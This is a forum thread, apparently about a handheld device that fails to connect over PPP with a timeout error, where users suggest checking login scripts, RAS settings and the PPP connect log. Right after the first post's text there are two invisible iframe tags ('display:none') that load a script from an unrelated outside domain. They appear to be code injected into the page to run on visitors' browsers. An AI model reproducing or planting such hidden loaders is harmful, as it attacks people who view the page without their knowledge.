+ Reply to Thread

Unhappy Can't connect via PPP Getting Error PPP Timeout (0x1231)

Anyone else have this error? Its really getting on my nerves since I bought this with this in mind. I'd like to be able to ssh in and grab my email without Sprint's proprietary web.

Is that so wrong?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I've been using PPP without problems. What have you set up in terms of scripting? (preferences/network/details/script)
    The default is a standard shell login script handler that may not be appropriate for your situation.

What are you PPP'ing into? I have seen that error message when dialing into WinNT/Win2k systems that had RAS enabled but didnt have the modem port set for inbound(it doesnt default to that). But I believe that error is rather generic and means that the modem on the other end picked up and negotiated but never sent the PPP intiation/login request, which could point to a host of problems depending on the system.

Justin

I made a new connection and was able to connect with SLIP, but that doesn't help me surf.

No scripts necessary for any of them.

I have the ISP's number and my user name and password entered it connects but has that dumb timeout error. I have tried it a couple of ways and a couple of ISP's.

Has anyone else had a problem like this?

One more thing. I have tried to use Mocha PPP like some other users (I'll post there in a minute). And even that has failed to connect, I get a "Connection Disabled" message and it won't go away. I have gone through the baud settings about 15 times and the settings for the software about 100.

Frustated,
    D.

Originally posted by Harangutan
    I've been using PPP without problems. What have you set up in terms of scripting? (preferences/network/details/script)
    The default is a standard shell login script handler that may not be appropriate for your situation.
    Try going to:
    Pref>Network>Options>View Log. You should be able to see the PPP connect log and perhaps that will give you a clue as to what is happening. Also, some of my or may not know, that at the end of this log, you can enter in network commands like PING, etc. to do some trouble shooting once you are connected via PPP.
    Carl